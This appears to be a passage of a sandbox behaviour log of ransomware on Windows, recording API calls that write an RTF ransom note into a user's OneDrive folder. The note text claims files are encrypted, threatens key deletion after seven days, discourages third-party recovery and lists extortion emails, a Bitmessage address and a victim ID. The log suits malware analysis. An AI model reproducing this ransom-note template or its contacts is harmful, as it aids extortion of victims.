{{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x1eecea8, cbMultiByte=8717, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd p\\f1\\lang1049\\'e0\\f0\\lang1033 ssw\\f1\\lang1049\\'ee\\f0\\lang1033 rd.\\par\r\n2. \\f1\\lang1049\\'d3\\'ee\\f0\\lang1033 u must c\\f1\\lang1049\\'ee\\f0\\lang1033 nfirm th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n, r\\f1\\lang1049\\'e5\\f0\\lang1033 turn t\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd f\\f1\\lang1049\\'ee\\f0\\lang1033 ll\\f1\\lang1049\\'ee\\f0\\lang1033 w th\\f1\\lang1049\\'e5\\f0\\lang1033 instructi\\f1\\lang1049\\'ee\\f0\\lang1033 ns th\\f1\\lang1049\\'e0\\f0\\lang1033 t w\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nt t\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u.\\par\r\n3. R\\f1\\lang1049\\'e5\\f0\\lang1033 turn t\\f1\\lang1049\\'ee\\f0\\lang1033 sit\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 nd \\f1\\lang1049\\'f1\\f0\\lang1033 lick \\f1\\lang1049 \"\\f0\\lang1033 L\\f1\\lang1049\\'ee\\f0\\lang1033 gin\\f1\\lang1049 \"\\f0\\lang1033 l\\f1\\lang1049\\'e0\\f0\\lang1033 b\\f1\\lang1049\\'e5\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 r us\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_in }}{\\fldrslt{https://bitmsg.me/users/sign_in\\ul0\\cf0}}}}\\f0\\fs20 , \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd p\\f1\\lang1049\\'e0\\f0\\lang1033 ssw\\f1\\lang1049\\'ee\\f0\\lang1033 rd \\f1\\lang1049\\'e0\\f0\\lang1033 nd click th\\f1\\lang1049\\'e5\\f0\\lang1033 \"Sign in\" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n. \\f1\\lang1049 \\f0\\lang1033\\par\r\n4. \\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"\\f1\\lang1049\\'d1\\f0\\lang1033 r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 t\\f1\\lang1049\\'e5\\f0\\lang1033 R\\f1\\lang1049\\'e0\\f0\\lang1033 nd\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 ddr\\f1\\lang1049\\'e5\\f0\\lang1033 ss\" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\par\r\n5. \\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"N\\f1\\lang1049\\'e5\\f0\\lang1033 w m\\f1\\lang1049\\'e0\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 \" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\par\r\n\\b 6. S\\f1\\lang1049\\'e5\\f0\\lang1033 nding m\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 :\\par\r\nT\\f1\\lang1049\\'ee\\f0\\lang1033 :\\b0 \\f1\\lang1049\\'c5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'e0\\f0\\lang1033 ddr\\f1\\lang1049\\'e5\\f0\\lang1033 ss: \\b BM-2cXRWRW5Jv5hxbhgu2HJSJrtPf92iKshhm\\par\r\n\r\n\\pard\\sl240\\slmult1 Subj\\f1\\lang1049\\'e5\\'f1\\f0\\lang1033 t:\\b0 \\f1\\lang1049\\'c5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur ID: \\b 460F9943EA70F103\\par\r\nM\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 : \\b0 D\\f1\\lang1049\\'e5\\f0\\lang1033 scrib\\f1\\lang1049\\'e5\\f0\\lang1033 wh\\f1\\lang1049\\'e0\\f0\\lang1033 t \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u think n\\f1\\lang1049\\'e5\\f0\\lang1033 c\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 r\\f1\\lang1049\\'f3\\f0\\lang1033 .\\par\r\n\r\n\\pard\\ri-74\\sa200\\sl240\\slmult1\\tx8378\\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"S\\f1\\lang1049\\'e5\\f0\\lang1033 nd m\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 \" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\cf5\\b\\par\r\n\r\n\\pard\\sa200\\sl240\\slmult1\\fs28 GCMD9HhH\\cf0\\f1\\fs32\\lang1049\\par\r\n\\par\r\n}\r\n", lpUsedDefaultChar=0x0) returned 8717 [0298.702] WriteFile (in: hFile=0x27c, lpBuffer=0x1eecea8*, nNumberOfBytesToWrite=0x220d, lpNumberOfBytesWritten=0x374fdb4, lpOverlapped=0x0 | out: lpBuffer=0x1eecea8*, lpNumberOfBytesWritten=0x374fdb4*=0x220d, lpOverlapped=0x0) returned 1 [0298.703] CloseHandle (hObject=0x27c) returned 1 [0298.703] GetFileAttributesW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\ca\\#README_EMAN#.rtf" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\onedrive\\17.3.6998.0830\\ca\\#readme_eman#.rtf")) returned 0xffffffff [0298.703] GetLastError () returned 0x2 [0298.727] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\ca\\#README_EMAN#.rtf" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\onedrive\\17.3.6998.0830\\ca\\#readme_eman#.rtf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x27c [0298.728] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8717 [0298.728] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd 